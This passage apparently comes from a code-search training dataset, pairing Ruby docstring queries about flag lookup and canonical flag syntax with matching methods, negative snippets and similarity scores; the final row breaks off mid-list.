"def cpu_flags\n cpuinfo = cmd_exec('cat /proc/cpuinfo').to_s\n\n return unless cpuinfo.include? 'flags'\n\n cpuinfo.scan(/^flags\\s*:(.*)$/).flatten.join(' ').split(/\\s/).map(&:strip).reject(&:empty?).uniq\n rescue\n raise'Could not retrieve CPU flags'\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def count\n @flags.size\n end",
"def configured_feature_flags\n feature_flag_options.sort_by(&:name).map(&:to_h).reduce({}, :merge).with_indifferent_access\n end",
"def aclflags\r\n\t\t\t`#{BITS::BITSADMIN} /getaclflags {#{@id}}`\r\n\t\tend",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n return data\n end",
"def flags=(lst); dirty!; super; end",
"def used_bits(_options = {})\n used_bits = []\n named_bits do |_name, bit|\n used_bits << bit.position if bit.size == 1\n if bit.size > 1\n used_bits << ((bit.position)..(bit.position + bit.size - 1)).to_a\n end\n end\n used_bits.flatten!\n used_bits.sort!\n used_bits\n end",
"def each(&blk)\n @flags.each(&blk)\n end",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n data\n end",
"def get_flags(opts = {})\n data, _status_code, _headers = get_flags_with_http_info(opts)\n data\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def flow_flags\n @flow_flags ||= [@options[:flow_flag] || @options[:flow_flags]].flatten.compact\n end",
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n self - words\n end",
"def defined_permissions\n FLAGS.collect { |value, name| (@bits & (1 << value)).positive? ? name : nil }.compact\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags\n raise NotImplementedError.new(\"flags() must be implemented by subclasses of AbstractVersionedFile.\")\n end",
"def bits\n self.class.bits.select { |bit, _| include? bit }.keys\n end",
"def feature_flags\n 0\n end",
"def index\n @flags = Flag.custom_flags\n end",
"def flags; changeset.flags(@path); end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def bits\n flavor_info[:bits]\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def flag_def\n @@flag_def||=reset_flag_def\n @@flag_def[self.to_s]||[]\n end",
"def show_masks\n ret = Hash.new\n self::MASKS.each do |meth,mask|\n ret[meth] = mask.map { |m| self::MASK_INFO[m] }\n end\n ret\n end",
"def applied\n @applied ||= []\n end",
"def bits\n self.class.bits.select { |bit, _| include? bit }.keys\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def perms_set\n PRIV_FLAG_COLUMNS.select { |pfc| self[pfc] == 'Y' }.to_set\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def stability_flags\n alias_of.stability_flags\n end",
"def modes\n @modes + autobuild.utilities.values.\n find_all { |u| u.enabled? }.\n map(&:name)\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def all_values\n _acts_as_enum_state.by_ordinal.values\n end",
"def notifyflags\r\n\t\t\t`#{BITS::BITSADMIN} /getnotifyflags {#{@id}}`\r\n\t\tend",
"def device_compliance_setting_states\n return @device_compliance_setting_states\n end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def all\n @options\n end",
"def modes\n fix_mode.modes\n end",
"def flags\n (self[:type_flags] & 0xfc)\n end",
"def flags(path)\n info = file_info(path)[1]\n return \"\" if info.nil?\n info\n end",
"def all\n data = service.list_flags.to_h[:items] || []\n load(data)\n end",
"def index\n @flags = Flag.all\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def enabled_lints\n (Lint.all - disabled_lints).uniq\n end",
"def flagged\n @data_hash.keys.select { |key| @data_hash[key].flagged }\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def status_flags\n\tstatus_bits_to_flags(self.status)\n end",
"def active?\n !effective_flags.empty?\n end",
"def addCFlags(flags) @CFLAGS = ensureArray(flags) + @CFLAGS end"
] | [
"0.71123785",
"0.7064988",
"0.677054",
"0.677054",
"0.6765211",
"0.6728041",
"0.6672082",
"0.65038013",
"0.65038013",
"0.64296246",
"0.6422122",
"0.6413207",
"0.63778657",
"0.63652533",
"0.6348326",
"0.6332696",
"0.6223134",
"0.6174319",
"0.61449414",
"0.6109141",
"0.6054181",
"0.6054181",
"0.6041879",
"0.6025255",
"0.5994375",
"0.59710157",
"0.5969499",
"0.59604514",
"0.5906607",
"0.58873785",
"0.5885868",
"0.5870943",
"0.5797214",
"0.579354",
"0.57723814",
"0.5735775",
"0.5709907",
"0.5677871",
"0.5677411",
"0.5666641",
"0.5661376",
"0.5639491",
"0.5637619",
"0.5626162",
"0.5612635",
"0.56097865",
"0.5595044",
"0.55945754",
"0.55830926",
"0.5556668",
"0.5556668",
"0.5535473",
"0.5523701",
"0.55093473",
"0.5507573",
"0.55062616",
"0.54919297",
"0.54902065",
"0.5477184",
"0.54678667",
"0.5457344",
"0.54340494",
"0.5432791",
"0.54199594",
"0.5408334",
"0.5394034",
"0.5394034",
"0.5393507",
"0.53875655",
"0.5360622",
"0.5358542",
"0.534435",
"0.5343868",
"0.533875",
"0.5338408",
"0.52867436",
"0.5286167",
"0.5284677",
"0.5282692",
"0.5280567",
"0.5279738",
"0.52761865",
"0.52749753",
"0.52695394",
"0.5269134",
"0.5239667",
"0.5228699",
"0.5227629",
"0.5224481",
"0.5213458",
"0.52070373",
"0.51931936",
"0.5183374",
"0.51790255",
"0.51760304",
"0.51630974",
"0.5152213",
"0.5130846",
"0.51095176",
"0.51050836"
] | 0.8119101 | 0 |
Look up the flag by string. Returns an object that indicates whether the given string matched this flag, whether the match was unique, and other pertinent information. | def resolve(str)
resolution = Resolution.new(str)
flag_syntax.each do |fs|
if fs.positive_flag == str
resolution.add!(self, fs, false, true)
elsif fs.negative_flag == str
resolution.add!(self, fs, true, true)
elsif fs.positive_flag.start_with?(str)
resolution.add!(self, fs, false, false)
elsif fs.negative_flag.to_s.start_with?(str)
resolution.add!(self, fs, true, false)
end
end
resolution
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def find_flag(flag_name, flag_state=nil)\n detect do |flag|\n flag.name == flag_name && (flag_state.nil? || flag.state == flag_state)\n end\n end",
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flag_for(tag)\n return @flags.detect { |flag| flag.tag == tag}\n end",
"def match(string)\n result = @trie[string]\n return nil unless result\n result.each do |pattern, block|\n match = pattern.match(string)\n block.call(match) if match\n end\n end",
"def find_me(arg)\n if @names[arg]\n return [true,nil]\n end\n @names.keys.each() do |name|\n if name =~ /^-(\\w)$/\n match_string = \"^\\\\-(\\\\w*)#{$1}(\\\\w*)$\"\n match_data = arg.match(match_string)\n if match_data\n # Note that if [1] and [2] were both empty \n # we'd have returned above\n return [true, \"-\" + match_data[1] + match_data[2]]\n end\n end\n end\n [false]\n end",
"def search_in(label, string)\n if !LABELS.include? label.to_sym\n raise ArgumentError, \"Unknown key: #{label}\"\n end\n\n find_all do |entry|\n text = entry.send(label).str\n text.match(/#{string}/i)\n end\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def find_param_for_flag(flag)\n params_with(:flag).each do |param_name, param_flag|\n return param_name if flag.to_s == param_flag.to_s\n end\n nil\n end",
"def find_entry!(string)\n string = string.upcase\n [ string, words.get(string) ] if words.has_key?(string)\n end",
"def find_by_value_str(value_str)\n value_str = value_str.to_s\n by_value_str[value_str]\n end",
"def found_match(str)\n\tif dictionary.include?(str) # returns true if found in the dictionary\n\t\treturn str # don't stop the recursion, but return the word ?\n\tend\n\tfalse\nend",
"def get_flag(color)\n @map.flags.find{ |f| f.color == color }\n end",
"def get(string)\n @strings[string]\n end",
"def find_by_value_str(value_str)\n value_str = value_str.to_s\n by_value.each do |value, instance|\n return instance if value_str == value.to_s\n end\n nil\n end",
"def find(string)\n string = string.split(//).join(\".*?\")\n pattern = \"/#{string}/i\"\n\n results = self.cache.grep /#{string}/i\n\n return results\n end",
"def test_stringflag_as_string\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz abcd)\n assert_equal true, opts[:xyz_given]\n assert_equal \"abcd\", opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz abcd --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal \"abcd\", opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def op_type(str)\n str\n match_id, match_filter_map = str.match(IDENTITY_REGEX2), str.match(FILTER_MAP_REGEX2)\n if FILTER_REGEX2 === str\n if match_filter_map[:mappable] == \" \" || match_filter_map[:mappable] == match_filter_map[:parameter]\n return :filter\n end\n # p match_filter_map\n if match_filter_map[:filterable] == match_filter_map[:parameter] || match_filter_map[:filterable] == \" \"\n if match_filter_map[:mappable].strip == match_filter_map[:parameter].strip\n return :identity\n else\n # somtehing here\n return :map\n end\n # elsif match_filter_map[:mappable] == match_filter_map[:parameter] || match_filter_map[:mappable] == \" \"\n\n end\n return :filter_map\n elsif MAP_REGEX2 === str\n if match_id[:identity].strip == match_id[:parameter].strip || match_id[:identity] == ' '\n return :identity\n else\n # map_match = str.match(M_REGEX)\n # p map_match[:mappable]\n # p 'hi'\n\n :map\n end\n end\nend",
"def get_keyword_value(string)\n return_string = String.new()\n found = false\n @keywordPairs.each do |pair|\n if pair[0] == string\n found = true\n return_string = pair[1]\n end\n end\n if found == false\n raise \"Error: In the command #{@utype}:#{@command_name} Attempted to get a Keyword pair #{string} present in the command\\n Is this keyword missing? \\n#{output}\"\n end\n return return_string\n end",
"def match_string t, d, context_d = d\n code, hash, t_text = unpack t\n puts \" match_string #{[code, hash, t_text, d, context_d]}\"\n eval_code code, (hash ? context_d : d)\n string_comparer t_text, d if t_text != nil\n hash\n end",
"def match_and_parse(string)\n meme = match(string)\n if meme.nil?\n return meme\n end\n bits = parse(meme, string)\n [meme, bits]\n end",
"def flag_state(flag_name)\n find_flag(flag_name).try(:state)\n end",
"def [](string)\n return nil unless cache_on?\n\n @mutex.synchronize { @cache[string] }\n end",
"def loc(string, opts = {})\n string = string.nil? ? '' : string.to_s\n opts[:language] ||= language\n opts[:platform] ||= platform\n bundle.strings_hash(opts)[string] || string\n end",
"def option(flag)\n options.find do |o|\n o.flags.any? { |f| clean_key(f) == clean_key(flag) }\n end\n end",
"def[](str)\n user_data[str.to_sym]\n end",
"def find_by_generic(name, type = nil)\n if name.nil?\n return nil\n elsif not name.is_a? String\n name = name.to_s\n end\n\n name = name.downcase\n @ghash.dup.each_value do |o|\n if type.nil?\n if o.generic.downcase == name or o.name.downcase == name or o.alt_names.find {|n| n.downcase == name }\n return o\n end\n else\n if o.is_a? type and (o.generic.downcase == name or o.name.downcase == name or o.alt_names.find {|n| n.downcase == name })\n return o\n end\n end\n end\n\n return nil\n end",
"def [](string)\n get(Risp::Symbol.intern(string))\n end",
"def match(str)\n d, m = str.split(\" \")\n _match(d, m) \n end",
"def unique_string(string)\n object = {}\n string.each_with_index do |el, i|\n if object[el]\n return false\n else\n object[el] = i\n end\n end\n true\nend",
"def lookup_name(arg)\n all_by_name[arg]\n end",
"def get_flag_option(flag_name)\n feature_flag_options.find_by(name: flag_name, feature_flaggable_type: self.class.name, feature_flaggable_id: id)\n end",
"def lookup(name)\n locations.find do |v|\n v.name.casecmp(name).zero? || (v.code == name)\n end\n end",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def flag_as(flag)\n raise ArgumentError if flag.class != String\n @flag = flag\n end",
"def matching_rule(string, relations)\n relations.each_with_index { |val, i| return i if val[0..2] == string }\n nil\n end",
"def active(str)\n # Maybe have a NullRuleSet\n @rule_heirarchy.find { |rule_set| rule_set.has?(str) }\n end",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n return -1\n end",
"def is_flag_attribute(word)\n define_method(word.to_sym) do |*args, &block|\n @result.__send__(\"#{word}=\".to_sym, true)\n end\n end",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n\n return -1\n end",
"def find_by_name(arrHash,strang)\nret = nil\n\tarrHash.each_with_index do |chack,index|\n\t\tif chack[:name]==strang\n\t\t\tret=chack\n\t\t\tbreak\n\t\tend\n\tend\n\tret\nend",
"def match?(name); end",
"def match(keyword); end",
"def matching_opts(arg, list, i)\n\t\t# Returns field of all exactly or abbreviated matching options.\n\t\tm = @option.values.select { |o| o.match?(arg, list, i) == :exact }\n\t\tif m.empty?\n\t\t\t@option.values.select { |o| o.match?(arg, list, i) == :abbrev }\n\t\telse\n\t\t\tm\n\t\tend \n\tend",
"def taxamatch(str1, str2, return_boolean = true)\n preparsed_1 = @parser.parse(str1)\n preparsed_2 = @parser.parse(str2)\n match = taxamatch_preparsed(preparsed_1, preparsed_2) rescue nil\n return_boolean ? (!!match && match['match']) : match\n end",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def at(search_string)\n self.search(search_string).first\n end",
"def extract_value(string, idx)\n if string.include?('=')\n string.split('=')[1]\n elsif @array.size == idx\n 'true'\n elsif @array[idx].start_with?('--')\n 'true'\n else\n @array[idx]\n end\n end",
"def get_match(match)\n fetch(\"match/#{match}\")\n end",
"def find(str)\n found_hash = {} #start with an empty hash\n if str.is_a? String\n @hash.each do |key,value|\n if key[0...str.length] == str #key[0...str.length] equates to characters from length 0 to str.length\n found_hash[key] = value #create new hash if statement is true\n end\n end\n return found_hash\n end\n end",
"def has_battle_command_by_string(name)\n @battle_commands.each_with_index do |command, index|\n if (command.name.casecmp(name) == 0)\n return index\n end\n end\n return -1\n end",
"def find(arr, str)\n\tarr.each { |item| \n\t\tif item == str\n\t\t\tp \"#{str} is in the zombie_apocalypse_supplies!\"\n\t\tend\n\t}\nend",
"def exact_match(user_word)\n @loader.arr.each do |word|\n return word if word == user_word\n end\n end",
"def case_insensitive_match=(_arg0); end",
"def match?(str)\n query = query_obj(str)\n tag_query = query[:tag]\n class_query = query[:classes]\n prop_query = query[:properties]\n\n (tag_query.blank? || match_tag?( tag_query )) &&\n (class_query.blank? || match_class?( class_query )) &&\n (prop_query.blank? || match_prop?( prop_query ))\n end",
"def match? string\n match = false\n patterns.each{|p|\n p string, p, \"===\"\n if string =~ Regexp.new(p.content)\n match = true\n break\n end\n }\n return match\n end",
"def which_matches(sel, dev)\n # regex match :)\n sel.each { |str|\n return str if dev[:name] =~ /^#{str}$/\n }\n return nil\nend",
"def find_by_name(name)\n matching = country_codes.select do |k, v|\n [*v].include? name\n end || {}\n\n # ruby 1.8\n returner = ItuCodes::Helpers.keys_from_hash(matching)\n\n if returner.size <= 1\n returner.first\n else\n returner\n end\n end",
"def flag_for(element, option = :flag)\n flag = nil\n flag_selector = element.options[option]\n unless flag_selector.nil?\n flag = @options[:flags][flag_selector] if @options[:flags].include?(flag_selector)\n end\n return flag\n end",
"def matches(str)\n each_match(str).to_a\n end",
"def match_a_string(name)\n case name\n in \"ruby\"\n puts \"https://www.ruby-lang.org/en/\"\n in \"python\"\n puts \"https://www.python.org/\"\n in \"elixir\"\n puts \"https://elixir-lang.org/\"\n else\n puts \"no match\"\n end\nend",
"def find_by_abbreviation!(abbreviation)\n all_cached.detect { |ct| ct.abbreviation == abbreviation } || super\n end",
"def lookup(string)\r\n return 2 ** (string.chr.downcase.ord - ('a'.ord))\r\n end",
"def food_group(str)\n food_groups = {\n \"grain\" => ['Rice', 'Trigo', 'Avena', 'Barley', 'Flour'],\n \"vegetable\" => ['Carrot', 'corn' 'Corn', 'Pumpkin', 'Papa'],\n \"fruit\" => ['Apple', 'Mango', 'Strawberry', 'Peaches', 'Pineapple'],\n \"meat\" => ['Beef', 'Chicken', 'Salmon', 'Fish', 'Pig'],\n \"dairy\" => ['Milk', 'Yogurt', 'Cheese', 'Cream']\n }\n\n food_groups.each do |k,array|\n array.each { |food| return k if food == str }\n end\n\n return 'food not found'\nend",
"def find_state(state_name)\n @states.find { |state| state.name.to_s == state_name.to_s }\n # TODO: use a data structure that prevents duplicates\n end",
"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def flag_hash\n flags.to_s.split(\", \").each_with_object({}) do |flag, hash|\n k, v = flag.split(\"=\")\n hash[k] = v\n end\n end",
"def match(str)\n return ['Result not found', 0] if @head.nil?\n holder = @head\n counter = 1\n while holder\n return [holder.data[1], counter] if holder.data[0] == str\n holder = holder.next\n counter += 1\n end\n ['Result not found', counter]\n end",
"def match(str=nil)\n return DelayedMatchConstructor.new unless str\n \n return Atoms::Re.new(str)\n end",
"def match(name)\n query(FindByString: name)\n end",
"def find_pattern(arr, string)\n element = arr.select { |name| name.include? string }\n arr.rindex(element[0])\nend",
"def find_trackable(trackable_str, trackable_id)\n trackable_str.constantize.find(trackable_id)\n end",
"def method_missing(name, *args)\n if name =~ /^is_(\\w+)\\?$/\n return state == $1.upcase\n end\n super\n end",
"def stat_long(string)\n if string == \"vit\"\n return \"Vitality\"\n elsif string == \"int\"\n return \"Intelligence\"\n elsif string == \"agi\"\n return \"Agility\"\n elsif string == \"str\"\n return \"Strength\"\n else\n return \"String given is not a Stat!\"\n end\n end",
"def fetch(flag)\n o = option(flag)\n if o.nil?\n cleaned_key = clean_key(flag)\n raise UnknownOption.new(\"option not found: '#{cleaned_key}'\", \"#{cleaned_key}\")\n else\n o.value\n end\n end",
"def get_make_var flag\n m = match Regexp.new(\"^#{flag}[ \\\\t]*=[ \\\\t]*(.*)$\")\n return m[1] if m\n return nil\n end",
"def get_make_var flag\n m = match Regexp.new(\"^#{flag}[ \\\\t]*=[ \\\\t]*(.*)$\")\n return m[1] if m\n return nil\n end",
"def flagged?(symbol)\n @flags.member?(symbol)\n end",
"def feature_flag_as_hash(flag_name)\n if FeatureFlag.where(name: flag_name).exists?\n {\n flag_name.to_s => feature_flag_for(flag_name)\n }.with_indifferent_access\n end\n end",
"def comp(str)\n @@COMP_TABLE[str]\n end",
"def first_matching(key)\n @attributes.find do |a|\n a[0].downcase == key.downcase\n end\n end",
"def methodChecksIfStringUnique(parameter_string) \n\thash_to_return = {}\n\n\tparameter_string.each_char do |char|\n\t\thash_to_return[char].nil? ? hash_to_return[char] = true : (return false)\n\tend\n\n\ttrue\n\t\nend",
"def string_matches_pattern(pattern, string)\n case pattern\n when Regexp\n pattern === node['string']\n when String\n string.include?(pattern)\n end\nend",
"def matchingStrings(strings, queries)\n counting_hash = {}\n counting_hash.default = 0\n\n # For Cache\n strings.each do |s|\n counting_hash[s] ? counting_hash[s] += 1 : counting_hash[s] = 1\n end\n\n res = []\n queries.each do |q|\n res << counting_hash[q]\n end\n res\nend",
"def get_flags( remove = nil )\n\n\t\t# escape dashes for split\n\t\t@value.gsub!(/\\\\\\-/, \"<dash>\")\n\n\t\t# Remove command, split by spaces\n\t\tif remove.nil?\n\t\t\tvars = @value.split(/\\s-/)\n\t\telse\n\t\t\tvars = @value.gsub( remove, '' ).split(/\\s-/)\n\t\tend\n\n\t\t# Hash to return\n\t\tflags = Hash.new\n\t\t# for each pair of arguments, place in Hash\n\t\t# \tflags[ flag ] = argument\n\t\tvars.each do |str|\n\t\t\n\t\t\t# Extract key and value\n\t\t\tkey = str[/^\\S+/]\n\t\t\tvalue = str.sub(/^\\S+ /, '' ).gsub(\"<dash>\", '-')\n\n\t\t\t# parse true/false values\n\t\t\tvalue = true if value.downcase == 'yes' or value.downcase == 'true'\n\t\t\tvalue = false if value.downcase == 'no' or value.downcase == 'false'\n\n\t\t\tvalue.chop! if value[-1] =~ /\\s/\n\t\t\tvalue = nil if value == ''\n\n\t\t\tflags[ key.to_sym ] = value unless key.nil?\n\t\t\t\n\t\tend\t\t\n\n\t\t# Return result\n\t\tflags\n\n\tend",
"def match_string( tree, string )\n # puts \"Checking for `#{string}` in tree (#{tree}).\"\n\n if tree.empty?\n # puts \"Tree is empty, returning empty\"\n return [ ]\n\n elsif string.empty?\n # puts \"No search string, returning empty\"\n return [ ]\n\n else\n matches = [ ]\n\n tree.each do |key,val|\n # puts \"Checking for `#{string}` in `#{key}` branch.\"\n\n simdex = string.simdex(key)\n\n if 0 < simdex\n if string == key\n # puts \"Matched full word! #{string} is #{key}\"\n # matches = collect_keys(val, key).unshift(key)\n return collect_keys(val, key).unshift(key)\n # puts \"Got matches: #{matches}\"\n\n else\n leaf = string.leaf(simdex)\n # puts \"Got leaf #{leaf}\"\n\n check = match_string(val, leaf)\n # puts \"Got check: #{check}\"\n\n if !check.empty?\n # matches = (check.map { |m| key + m })\n return check.map { |m| key + m }\n # puts \"New matches: #{matches}\"\n end\n end\n\n # break\n\n else\n check = match_string(val, string)\n\n if !check.empty?\n matches += check\n end\n end\n end\n\n # if matches.empty?\n # # puts \"No matches (#{string})\"\n # else\n # # puts \"Returning matches (#{string}): #{matches}\"\n # end\n\n return matches\n end\n end"
] | [
"0.63491124",
"0.5969406",
"0.5878499",
"0.5723808",
"0.57181597",
"0.5655273",
"0.5599379",
"0.54669285",
"0.5410632",
"0.5387644",
"0.5373354",
"0.5289001",
"0.5254369",
"0.5249525",
"0.5230608",
"0.5222844",
"0.5198079",
"0.51768315",
"0.5154593",
"0.51312244",
"0.51157",
"0.51079416",
"0.5029215",
"0.5023849",
"0.5023592",
"0.4962709",
"0.48834407",
"0.48630768",
"0.4861454",
"0.4860669",
"0.48562056",
"0.48496473",
"0.48222655",
"0.48213294",
"0.48164263",
"0.48164263",
"0.48161775",
"0.4796756",
"0.4795522",
"0.4793594",
"0.47835678",
"0.4770982",
"0.47567946",
"0.47479025",
"0.4740413",
"0.47332704",
"0.47288442",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4696649",
"0.46940514",
"0.46922913",
"0.46906778",
"0.46891686",
"0.46863633",
"0.46848053",
"0.46785545",
"0.46739116",
"0.46712738",
"0.46553233",
"0.46535403",
"0.4651236",
"0.46437588",
"0.46418813",
"0.4637851",
"0.46261486",
"0.46107626",
"0.4604026",
"0.45978183",
"0.45970136",
"0.4594401",
"0.4576958",
"0.45760328",
"0.45731938",
"0.45695376",
"0.4565921",
"0.45650166",
"0.45534173",
"0.4552288",
"0.4552288",
"0.4548248",
"0.45476237",
"0.45472705",
"0.45326036",
"0.45292526",
"0.45274302",
"0.45228043",
"0.4521084",
"0.45146126"
] | 0.61936486 | 1 |
A list of canonical flag syntax strings. | def canonical_syntax_strings
@canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flag\n flags.join(\", \")\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n [long, short].compact\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
